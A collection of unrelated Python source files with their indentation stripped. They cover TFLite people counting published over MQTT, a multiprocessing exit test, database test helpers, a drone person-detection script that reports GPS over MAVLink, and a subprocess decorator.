use_VideoWriter = args.record ### INITIALIZE VIDEOWRITER FLAG - JACOB HAGAN
showdisplay = args.showdisplay ### INITIALIZE DISPLAY FLAG - JACOB HAGAN
broker_ip = args.broker_ip ###ADDED BY COREY CLINE
client_name = args.client_name ###ADDED BY COREY CLINE
mqtt_topic = args.topic ###ADDED BY COREY CLINE
publish_interval = int(args.publish_interval) ###ADDED BY COREY CLINE
# Validate MQTT input arguments here - COREY CLINE
if broker_ip == None:
if mqtt_topic != "test/occupancy":
raise Exception( "Must specify a broker_ip to publish to a topic. " + \
"Use --broker-ip argument to connect to a broker." )
if client_name != "TX1":
raise Exception( "Must specify a broker_ip for a client_name. "+ \
"Use --broker-ip argument to connect to a broker." )
if publish_interval != 10:
raise Exception( "Must specify a broker_ip to publish at a given " + \
"interval. Use --broker-ip argument to connect " + \
"to a broker." )
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if (GRAPH_NAME == 'detect.tflite'):
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
# If the user wants to record the output, initialize the VideoWriter object - JACOB HAGAN
if use_VideoWriter:
writer = cv2.VideoWriter( "output/output.avi", cv2.VideoWriter_fourcc( *"MJPG" ), 4, (imW,imH) ) ### ADDED HERE TO SAVE VIDEO AS FILE - COREY CLINE
# Initialize data tracker and MQTT Client - ADDED BY COREY CLINE
if broker_ip:
pub_timer = time.perf_counter() ### INITIALIZE PUBLISH TIMER - ADDED BY COREY CLINE
tracker = DataTracker()
TX1_client = MQTTClient( broker_ip, client_name )
TX1_client.connect()
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame = cv2.flip( frame, -1 ) ### ADDED HERE TO FLIP IMAGE FROM VIDEO STREAM - COREY CLINE
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
#num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
# Track number of occupants - ADDED BY COREY CLINE
num_occupants = 0
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Count for People - ADDED BY COREY CLINE
if ( object_name == "person" ):
num_occupants += 1
# Draw framerate in corner of frame (Draw occupant number in corner of frame ADDED BY COREY CLINE)
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
cv2.putText(frame, 'PEOPLE: {}'.format(num_occupants),(30,90),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
if not showdisplay: ### IF DISPLAY FLAG IS NOT TRUE, PRINT DETECTION OUTPUT TO CONSOLE - JACOB HAGAN
print( "FPS: {0:.2f}".format(frame_rate_calc) + "\tPEOPLE: {}".format(num_occupants)) ### PRINT RESULTS TO CONSOLE - ADDED BY COREY CLINE
# All the results have been drawn on the frame, so it's time to display it.
if use_VideoWriter:
writer.write( frame ) ### ADDED HERE TO WRITE THE CURRENT FRAME TO THE VIDEO FILE - COREY CLINE
if showdisplay:
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Check for a broker connection before publishing - COREY CLINE
if broker_ip:
time_passed = time.perf_counter() - pub_timer ### ADDED BY COREY CLINE
# Add data point to tracker - ADDED BY COREY CLINE
tracker.add_point( num_occupants )
# Check mqtt publish timer - ADDED BY COREY CLINE
if ( time_passed ) > publish_interval:
mode = tracker.get_mode()
tracker.clear_data()
TX1_client.client.loop_start()
TX1_client.publish( mqtt_topic, mode, qos = 2, retain = False )
TX1_client.client.loop_stop()
print( "PEOPLE: {}".format( mode ) )
pub_timer = time.perf_counter()
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
# Clean up
cv2.destroyAllWindows()
videostream.stop()
if use_VideoWriter:
writer.release() ### ADDED HERE TO RELEASE THE VIDEO WRITER AND SAVE THE FILE - COREY CLINE
|
parellel_test_20191203.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Problem: certain sub-processes are not completing
Created on 2019-12-03 at 17:38
@author: cook
"""
import time
from multiprocessing import Process, Manager, Event
import numpy as np
import warnings
import os
import sys
import string
# ------------------------------------------------------------------------------
# constants
# ------------------------------------------------------------------------------
# max time to be in the taxing function (similar to my recipes)
# we also add +/- 25% to this time so they do not all finish at the same time
MAXTIME = 10
# a high number of cores (way higher than normal)
CORES = 20
# number of groups (we have multiple groups of parallel processes
# one group (with X cores) starts after another
# finishes (with X cores))
GROUPS = 1
# number of sub groups (within a group we have the recipe runs) these
# sub-groups are all the same recipe and divided by the number of cores
SUBGROUPS = 5
# On error what should we do
STOP_AT_ERROR = False
# ------------------------------------------------------------------------------
# This is to test a sys.exit()
TEST_SYS_EXIT = False
# this is the group num + core num to exit in [group num, core num, sub group]
TEST_SYS_NUMS = [0, 1, 'b']
# ------------------------------------------------------------------------------
# this is to test a ValueError exit (a standard python exit)
TEST_VALUE_ERROR = False
# this is the group num + core num to exit in [group num, core num, sub group]
TEST_VALUE_NUMS = [0, 1, 'b']
# ------------------------------------------------------------------------------
# This is to test a sys.exit()
TEST_OS_EXIT = True
# this is the group num + core num to exit in [group num, core num, sub group]
TEST_OS_NUMS = [0, 1, 'b']
# ------------------------------------------------------------------------------
# functions
# ------------------------------------------------------------------------------
def taxing(it, jt, kt):
"""
This simulates running a recipe
(nothing in here should change)
"""
stop_loop = False
start = time.time()
# set up x
x = it + jt
# add a random component to the time
randcomp = np.random.uniform(-MAXTIME/4, MAXTIME/4)
# create a large-ish array
y = np.random.normal(0, 1, 4096*4096).reshape((4096, 4096))
with warnings.catch_warnings(record=True) as _:
z = y ** np.log(y)
z = z ** y
# loop until time is up
while not stop_loop:
x*x
if time.time() - start > (MAXTIME + randcomp):
stop_loop = True
# --------------------------------------------------------------------------
# deal with sys exit tests
if TEST_SYS_EXIT:
if TEST_SYS_NUMS[0] == it and TEST_SYS_NUMS[1] == jt and TEST_SYS_NUMS[2] == kt:
sys.exit(0)
# deal with value error tests
if TEST_VALUE_ERROR:
if TEST_VALUE_NUMS[0] == it and TEST_VALUE_NUMS[1] == jt and TEST_SYS_NUMS[2] == kt:
raise ValueError('ValueError {0}-{1}-{2}'.format(it, jt, kt))
# deal with os exit tests
if TEST_OS_EXIT:
if TEST_OS_NUMS[0] == it and TEST_OS_NUMS[1] == jt and TEST_SYS_NUMS[2] == kt:
print('EXIT {0}-{1}-{2}'.format(it, jt, kt))
os._exit(0)
def myfunc(it, jt, event, rdict):
"""
This simulates the recipe controller
This is what is ran by multiprocessing.Process
this should not change (other than how we call event)
"""
letters = string.ascii_lowercase
for kit in range(SUBGROUPS):
if SUBGROUPS < len(letters):
kt = letters[kit]
else:
kt = kit
if event.is_set():
print('Skip group={0} core={1} sub={2}'.format(it, jt, kt))
return rdict
try:
# run a function that does something
print('Run: group={0} core={1} sub={2}'.format(it, jt, kt))
taxing(it, jt, kt)
print('Finish: group={0} core={1} sub={2}'.format(it, jt, kt))
# add to rdict after
rdict[(it, jt, kt)] = True
except KeyboardInterrupt:
print('KeyboardInterrupt group={0} core={1} sub={2}'
''.format(it, jt, kt))
event.set()
except Exception as e:
print('Exception group={0} core={1} sub={2}'.format(it, jt, kt))
if STOP_AT_ERROR:
event.set()
except SystemExit:
print('SystemExit group={0} core={1} sub={2}'.format(it, jt, kt))
if STOP_AT_ERROR:
event.set()
# rdict is return and multiprocessing manages combining
# the dictionary between parallel processes
return rdict
# ------------------------------------------------------------------------------
# main
# ------------------------------------------------------------------------------
if __name__ == '__main__':
# event handling (using .is_set and set)
event = Event()
# shared data between processes
manager = Manager()
# just a dictionary
return_dict = manager.dict()
# number of runs = number_groups * number_cores
# = 3 * 100
# loop around groups (number of times to run the set of parallel jobs)
for it in range(GROUPS):
jobs = []
# these are the cores (set ridiculously high)
# - these all start in parallel
for jt in range(CORES):
process = Process(target=myfunc, args=[it, jt, event, return_dict])
process.start()
jobs.append(process)
# after starting all parallel processes we join each one,
# wait then join the next
# --> all jobs must terminate to move on to the next group
for pit, proc in enumerate(jobs):
proc.join()
# as a check
print('Number of runs expected: {0}'.format(GROUPS * CORES * SUBGROUPS))
print('Number of runs processed: {0}'.format(len(return_dict.keys())))
# ==========================================================================
#
# NOTES
#
# ==========================================================================
#
# TEST_SYS_EXIT is caught - we lose 1 entry from rdict
# processes in later groups run
# (if STOP_AT_ERROR=False)
#
# TEST_VALUE_ERROR is caught - we lose 1 entry from rdict
# processes in later groups run
# (if STOP_AT_ERROR=False)
#
# TEST_OS_EXIT is not caught - we lose 1 entry from rdict
#
#
#
|
helpers.py
|
import multiprocessing
import time
import socket
import logging
import re
from contextlib import contextmanager
from playhouse.test_utils import assert_query_count, _QueryLogHandler
from data.database import LogEntryKind, LogEntry3
class assert_action_logged(object):
"""
Specialized assertion for ensuring that a log entry of a particular kind was added under the
context of this call.
"""
def __init__(self, log_kind):
self.log_kind = log_kind
self.existing_count = 0
def _get_log_count(self):
return (
LogEntry3.select().where(LogEntry3.kind == LogEntryKind.get(name=self.log_kind)).count()
)
def __enter__(self):
self.existing_count = self._get_log_count()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_val is None:
updated_count = self._get_log_count()
error_msg = "Missing new log entry of kind %s" % self.log_kind
assert self.existing_count == (updated_count - 1), error_msg
class log_queries(object):
""" Logs all queries that occur under the context. """
def __init__(self, query_filters=None):
self.filters = query_filters
def get_queries(self):
queries = [q.msg[0] for q in self._handler.queries]
if not self.filters:
return queries
filtered_queries = []
for query_filter in self.filters:
filtered_queries.extend([q for q in queries if re.match(query_filter, q)])
return filtered_queries
def __enter__(self):
logger = logging.getLogger("peewee")
self._handler = _QueryLogHandler()
logger.setLevel(logging.DEBUG)
logger.addHandler(self._handler)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
logger = logging.getLogger("peewee")
logger.removeHandler(self._handler)
class check_transitive_modifications(log_queries):
""" Checks for Peewee-generated transition deletion queries and fails if any are found.
These kinds of queries (which use subqueries) can lock massively on MySQL, so we detect
them and fail.
"""
def __init__(self):
filters = [r"^DELETE.+IN \(SELECT.+$", r"^UPDATE.+IN \(SELECT.+$"]
super(check_transitive_modifications, self).__init__(query_filters=filters)
def __exit__(self, exc_type, exc_val, exc_tb):
super(check_transitive_modifications, self).__exit__(exc_type, exc_val, exc_tb)
queries = self.get_queries()
if queries:
raise Exception("Detected transitive deletion or update in queries: %s" % queries)
_LIVESERVER_TIMEOUT = 5
@contextmanager
def liveserver_app(flask_app, port):
"""
Based on https://github.com/jarus/flask-testing/blob/master/flask_testing/utils.py.
Runs the given Flask app as a live web server locally, on the given port, starting it
when called and terminating after the yield.
Usage:
with liveserver_app(flask_app, port):
# Code that makes use of the app.
"""
shared = {}
def _can_ping_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(("localhost", port))
except socket.error:
success = False
else:
success = True
finally:
sock.close()
return success
def _spawn_live_server():
worker = lambda app, port: app.run(port=port, use_reloader=False)
shared["process"] = multiprocessing.Process(target=worker, args=(flask_app, port))
shared["process"].start()
start_time = time.time()
while True:
elapsed_time = time.time() - start_time
if elapsed_time > _LIVESERVER_TIMEOUT:
_terminate_live_server()
raise RuntimeError(
"Failed to start the server after %d seconds. " % _LIVESERVER_TIMEOUT
)
if _can_ping_server():
break
def _terminate_live_server():
if shared.get("process"):
shared.get("process").terminate()
shared.pop("process")
try:
_spawn_live_server()
yield
finally:
_terminate_live_server()
|
hr_RealAppNavQ.py
|
# USAGE (for real case application):
#
# python human_recog.py --mode 2 --target cpu
# python human_recog.py -m 2 -t cpu
# import the necessary packages
from imutils.video import FPS
import argparse
import imagezmq
import socket
import signal
import time
import sys
import cv2
import dlib
from multiprocessing import Process
from multiprocessing import Queue
from multiprocessing import Value
from pymavlink import mavutil
import threading
#=======================================================================
# A thread that manage the acquisition of the GPS data
def getGPS_thread(out_q, mutex, verbose):
i = 0
while mainHR_v.value:
mutex.acquire()
msg = hoverGames.recv_match()
mutex.release()
if not msg:
continue
if msg.get_type() == 'GPS_RAW_INT':
if verbose is not None:
print("\n\n*****Got message: %s*****"%msg.get_type())
print("Message: %s"%msg)
print("As dictionary: %s"%msg.to_dict())
print(" Lat. : %s"%msg.lat)
print(" Lon. : %s"%msg.lon)
print(" eph. : %s"%msg.eph)
if out_q.empty() is False:
out_q.get()
# an queue, to exchange GPS data safely
# with the main application
out_q.put([msg.lat, msg.lon])
time.sleep(0.05)
print("[INFO] : GPS thread end.")
#=======================================================================
# a function to handle keyboard interrupt
def signal_handler_CtrlC(sig, myFrame) :
print ("")
print ("[INFO] : You pressed Ctrl + C ...")
#signal.signal(signal.SIGINT, signal.SIG_DFL)
#===============================================================
# terminate main loop & GPS data acquisition loop
mainHR_v.value = 0
#===============================================================
print ("[INFO] : Ctrl + C clean up end !!!")
#=======================================================================
# save the output data (where the human subject are recognized) to file
def write_video(outputPath, writeVideo, frameWQueue, W, H):
# initialize the FourCC and video writer object
# fourcc = 4-byte code used to specify the video codec:
# DIVX, XVID, MJPG, X264, WMV1, WMV2
print("[INFO] : Configuring writing process.")
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
writer = cv2.VideoWriter (outputPath, fourcc, 30.0, (W, H), True)
# loop while the write flag is set or the output
# frame queue is not empty
print("[INFO] : Starting writing process.")
while writeVideo_v.value or not frameWQueue.empty():
# check if the output frame queue is not empty
if not frameWQueue.empty():
# get the frame from the queue and write the frame
frame = frameWQueue.get()
#print("[myINFO] Right now I'm write data...")
writer.write(frame)
# release the video writer object
writer.release()
print("[INFO] : Writer process end.")
#=======================================================================
# stream the human recognition results through ZeroMQ to a server
def stream_video(myServerIP, streamVideo, frameSQueue, jpeg_quality):
# loop while the stram flag is set or
# the output frame queue is not empty
print("[INFO] : Starting streaming process.")
# initialize the ImageSender object with
# the socket address of the server
sender = imagezmq.ImageSender(connect_to="tcp://{}:5555".format(myServerIP))
# get the host name
navq_Name = socket.gethostname()
# loop while the stream flag is set or
# the output frame queue is not empty
while streamVideo.value or not frameSQueue.empty():
# check if the output frame queue is not empty
if not frameSQueue.empty():
# get the frame from the queue and write the frame
frame = frameSQueue.get()
# flips the frame vertically
# frame = cv2.flip(frame,0)
ret_code, jpg_buffer = cv2.imencode(".jpg", frame,
[int(cv2.IMWRITE_JPEG_QUALITY), jpeg_quality])
# send the jpeg image
sender.send_jpg(navq_Name, jpg_buffer)
print("[INFO] : The streaming process end.")
#=======================================================================
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-m", "--mode", type=int, required=True,
choices=[0, 1, 2],
help="Working mode: 0 - local, 1 - streaming, 2 - full")
ap.add_argument("-t", "--target", type=str, required=True,
choices=["myriad", "cpu"],
help="target processor for object detection")
ap.add_argument("-i", "--input", type=str,
help="path to the input video file")
ap.add_argument("-o", "--output", type=str,
help="path to optional output video file")
ap.add_argument("-s", "--server-ip",
help="ip address of the server to which the client will connect")
ap.add_argument("-v", "--verbose", nargs='?',
help="provide various information to understand what is happening in the system")
args = vars(ap.parse_args())
#=======================================================================
# initialize mainly the variable with global efect
#0 to 100, higher is better quality, 95 is cv2 default
jpeg_quality = 65
# number of skip frames:
# * 1 detection performed with MobileNet-SSD in the first frame,
# * {skip_frames - 1} frames in which the tracking is done through
# the correlation tracker algorithm
skip_frames = 15
# the number of frames after a custom MAVlink message will be sent
customMess_frames = 40
#=======================================================================
# check if the IP address of the server exist in the case of
# selecting the streaming mode
if args["mode"] == 1:
if args["server_ip"] is None:
print(" ")
print("[ERROR] : You selected the streaming mode, but no server IP")
print(" ")
sys.exit(0)
#=======================================================================
# initialize the list of class labels MobileNet SSD detects
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
#=======================================================================
# load our serialized model from disk
print("[INFO] : Loading dnn MobileNet model...")
net = cv2.dnn.readNetFromCaffe("mobilenet_ssd/MobileNetSSD_deploy.prototxt",
"mobilenet_ssd/MobileNetSSD_deploy.caffemodel")
#=======================================================================
# check if the target processor is myriad, if so, then set the
# preferable target to myriad
if args["target"] == "myriad":
net.setPreferableTarget (cv2.dnn.DNN_TARGET_MYRIAD)
# otherwise, the target processor is CPU
else:
# set the preferable target processor to CPU and
# preferable backend to OpenCV
net.setPreferableTarget (cv2.dnn.DNN_TARGET_CPU)
net.setPreferableBackend (cv2.dnn.DNN_BACKEND_OPENCV)
# the DNN just processed the frame
dnnWork = 0
#=======================================================================
# MAVLink2
# create a connection to FMU
if args["mode"] == 2:
mavutil.set_dialect("video_monitor")
# create a connection to FMU
hoverGames = mavutil.mavlink_connection("/dev/ttymxc2", baud=921600) # input=False
# wait for the heartbeat message to find the system id
hoverGames.wait_heartbeat()
if args["verbose"] is not None:
print("[INFO] : Heartbeat from system (system %u component %u)"%(hoverGames.target_system, hoverGames.target_component))
#=======================================================================
# Based on the input grab, a reference to the video file or to camera
# If no input video file. get data from Google Coral camera
if not args.get("input", False):
print("[INFO] : Starting camera video stream...")
vs = cv2.VideoCapture('v4l2src ! video/x-raw,width=640,height=480 ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
# allow the camera sensor to warmup
time.sleep(2.0)
else:
print("[INFO] : Opening input video file...")
vs = cv2.VideoCapture(args["input"])
#=======================================================================
# INIT
#=====================================================
# initialize the frame dimensions
W = None
H = None
# initialize the number of frames processed up to now
noFrames = 0
confidence = 0
myLatitude = 0
myLongitude = 0
#=======================================================================
writerProcess = None
streamProcess = None
threadGPS = None
writeVideo_v = None
streamVideo_v = None
threadGPS_v = None
mainHR_v = None
getgpsQueue = None # the GPS data frame queue
frameWQueue = None # the frame queue for avi file writing
frameSQueue = None # the frame queue for the video streaming
mainHR_v = Value('i', 1)
#=======================================================================
# begin writing the video to disk if required
if args["mode"] == 2 and threadGPS is None:
print("[INFO] : Configuring the process used to get GPS data")
# initialize a frame queue
getgpsQueue = Queue()
# intialize a mutex
mutexGPS = threading.Lock()
#=======================================================================
threadGPS = threading.Thread(target=getGPS_thread, args=(getgpsQueue, mutexGPS, args["verbose"], ))
threadGPS.start()
#=======================================================================
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler_CtrlC)
#=======================================================================
print("[INFO] : Starting human detection...")
# start the frames per second throughput estimator
fps = FPS().start()
#=======================================================================
# loop over frames from the video stream
while mainHR_v.value:
# grab the next frame
if not args.get("input", False):
# read the frame from the camera
ret, frame = vs.read()
if ret == False:
print ("[Error] It was was impossible to aquire a frame!")
else:
# flips the frame vertically to compensate the camera mount
frame = cv2.flip(frame,0)
else:
frame = vs.read()
frame = frame[1]
# Having a video and we did not grab a frame then we
# have reached the end of the video
if frame is None:
break
# convert the frame from BGR to RGB for dlib
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# check to see if the frame dimensions are not set
if W is None or H is None:
# set the frame dimensions
(H, W) = frame.shape[:2]
#===================================================================
# begin writing the video to disk if required
if args["output"] is not None and writerProcess is None:
print("[INFO] : Configuring the writing process")
# set the value of the write flag (used here
# to start the imgs writing)
writeVideo_v = Value('i', 1)
# initialize a frame queue and start the video writer
frameWQueue = Queue()
writerProcess = Process(target=write_video,
args=(args["output"], writeVideo_v, frameWQueue, W, H))
writerProcess.start()
#===================================================================
# begin streaming the video to the server if required
if args["mode"] == 1 and streamProcess is None:
print("[INFO] : Configuring the streaming process")
# set the value of the write flag (used here
# to start the imgs streaming)
streamVideo_v = Value('i', 1)
# initialize a frame queue and start the video writer
frameSQueue = Queue()
streamProcess = Process(target=stream_video,
args=(args["server_ip"], streamVideo_v, frameSQueue, jpeg_quality))
streamProcess.start()
if noFrames % skip_frames == 0:
dnnWork = 1
# initialize a new set of detected human
trackers = []
confidences = []
if args["verbose"] is not None:
print(" ")
print("[INFO] : Starting DNN ... ")
# convert the frame to a blob
blob = cv2.dnn.blobFromImage(frame, size=(300, 300), ddepth=cv2.CV_8U)
# print("First Blob: {}".format(blob.shape))
# send the blob to the network
net.setInput(blob, scalefactor=1.0/127.5, mean=[127.5, 127.5, 127.5])
# pass the blob through the network and obtain the detections
networkOutput = net.forward()
if args["verbose"] is not None:
print("[INFO] : End DNN ... ")
for detection in networkOutput[0, 0]:
humanClass = int(detection[1])
if CLASSES[humanClass] != "person":
continue
confidence = float(detection[2])
# require a minimum confidence to reject fals positive detection
if confidence > 0.35:
confidences.append(confidence)
# work on the current frame
#====================================
left = int(detection[3]*W)
top = int(detection[4]*H)
right = int(detection[5]*W)
bottom = int(detection[6]*H)
#draw a red rectangle around detected objects
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), thickness=2)
label = "{}: {:.2f}%".format("Confidence", confidence*100)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(frame, label, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)
# prepare the following skip frames
#====================================
# construct a dlib rectangle object from the bounding
# box coordinates and then start the dlib correlation
# tracker
tracker = dlib.correlation_tracker()
rect = dlib.rectangle(left, top, right, bottom)
tracker.start_track(rgb, rect)
# add the tracker to our list of trackers so we can
# utilize it during skip frames
trackers.append(tracker)
else:
dnnWork = 0
i = 0
# loop over the trackers
for tracker in trackers:
# update the tracker and grab the updated position
tracker.update(rgb)
pos = tracker.get_position()
# unpack the position object
left = int(pos.left())
top = int(pos.top())
right = int(pos.right())
bottom = int(pos.bottom())
#draw a red rectangle around detected objects
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), thickness=2)
label = "{}: {:.2f}%".format("Confidence", confidences[i]*100)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(frame, label, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)
i +=1
if args["mode"] == 0:
if args["output"] is not None:
# writing the video frame to the writing queue
frameWQueue.put(frame)
else:
# show the output frame
cv2.imshow("Frame", frame)
if args["mode"] == 1:
# writing the video frame to the streaming queue
frameSQueue.put(frame)
if args["mode"] == 2:
# if customMess_frames passed then send the custom message
if noFrames % customMess_frames == 0:
if dnnWork == 1:
infoL = b'DNN'
else:
infoL = b'tracking'
if getgpsQueue.empty() is False:
lat_lon_GPS = getgpsQueue.get()
myLatitude = lat_lon_GPS[0]
myLongitude = lat_lon_GPS[1]
if args["verbose"] is not None:
print(" [Info] : Main prg. Lat. %s"%lat_lon_GPS[0])
print(" [Info] : Main prg. Lon. %s"%lat_lon_GPS[1])
#send custom mavlink message: video_monitor
mutexGPS.acquire()
hoverGames.mav.video_monitor_send(
timestamp = int(time.time() * 1e6), # time in microseconds
info = infoL,
lat = myLatitude,
lon = myLongitude,
no_people = len(confidences),
confidence = max(confidences) if len(confidences) != 0 else 0)
mutexGPS.release()
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# increment the total number of frames processed up to now
noFrames += 1
# update the FPS counter
fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] : Elapsed time: {:.2f}".format(fps.elapsed()))
print("[INFO] : Approx. FPS: {:.2f}".format(fps.fps()))
#=======================================================================
# release the video file pointer or video input stream
vs.release()
#=======================================================================
# terminate the video writer process
if writerProcess is not None and args["output"] is not None:
writeVideo_v.value = 0
writerProcess.join()
#=======================================================================
# terminate the video streaming process
if streamProcess is not None and args["mode"] == 1:
streamVideo_v.value = 0
streamProcess.join()
#=======================================================================
# close any open windows if exist
if args["output"] is None and args["mode"] == 0:
print("[INFO] : Destroying the main graphical window.")
cv2.destroyAllWindows()
#=======================================================================
# terminate all loop
mainHR_v.value = 0
threadGPS.join()
#=======================================================================
net.setPreferableTarget (cv2.dnn.DNN_TARGET_CPU)
net.setPreferableBackend (cv2.dnn.DNN_BACKEND_OPENCV)
print(" ")
print("[INFO] : The human recognition program finished!!!!")
|
processify.py
|
import inspect
import os
import sys
import traceback
from functools import wraps
from multiprocessing import Process, Queue
class Sentinel:
pass
# https://gist.github.com/schlamar/2311116 & https://gist.github.com/stuaxo/889db016e51264581b50
def processify(func):
'''Decorator to run a function as a process.
Be sure that every argument and the return value
is *pickable*.
The created process is joined, so the code does not
run in parallel.
'''
def process_generator_func(q, *args, **kwargs):
result = None
error = None
it = iter(func())
while error is None and result != Sentinel:
try:
result = next(it)
error = None
except StopIteration:
result = Sentinel
error = None
except Exception:
ex_type, ex_value, tb = sys.exc_info()
error = ex_type, ex_value, ''.join(traceback.format_tb(tb))
result = None
q.put((result, error))
def process_func(q, *args, **kwargs):
try:
result = func(*args, **kwargs)
except Exception:
ex_type, ex_value, tb = sys.exc_info()
error = ex_type, ex_value, ''.join(traceback.format_tb(tb))
result = None
else:
error = None
q.put((result, error))
def wrap_func(*args, **kwargs):
# register original function with different name
# in sys.modules so it is pickable
process_func.__name__ = func.__name__ + 'processify_func'
setattr(sys.modules[__name__], process_func.__name__, process_func)
q = Queue()
p = Process(target=process_func, args=[q] + list(args), kwargs=kwargs)
p.start()
result, error = q.get()
p.join()
if error:
ex_type, ex_value, tb_str = error
message = '%s (in subprocess)\n%s' % (str(ex_value), tb_str)
raise ex_type(message)
return result
def wrap_generator_func(*args, **kwargs):
# register original function with different name
# in sys.modules so it is pickable
process_generator_func.__name__ = func.__name__ + 'processify_generator_func'
setattr(sys.modules[__name__], process_generator_func.__name__, process_generator_func)
q = Queue()
p = Process(target=process_generator_func, args=[q] + list(args), kwargs=kwargs)
p.start()
result = None
error = None
while error is None:
result, error = q.get()
if result == Sentinel:
break
yield result
p.join()
if error:
ex_type, ex_value, tb_str = error
message = '%s (in subprocess)\n%s' % (str(ex_value), tb_str)
raise ex_type(message)
@wraps(func)
def wrapper(*args, **kwargs):
if inspect.isgeneratorfunction(func):
return wrap_generator_func(*args, **kwargs)
else:
return wrap_func(*args, **kwargs)
return wrapper
|
train_ug_pretrain.py
|
import tensorflow as tf
import numpy as np
import time
import datetime
import os
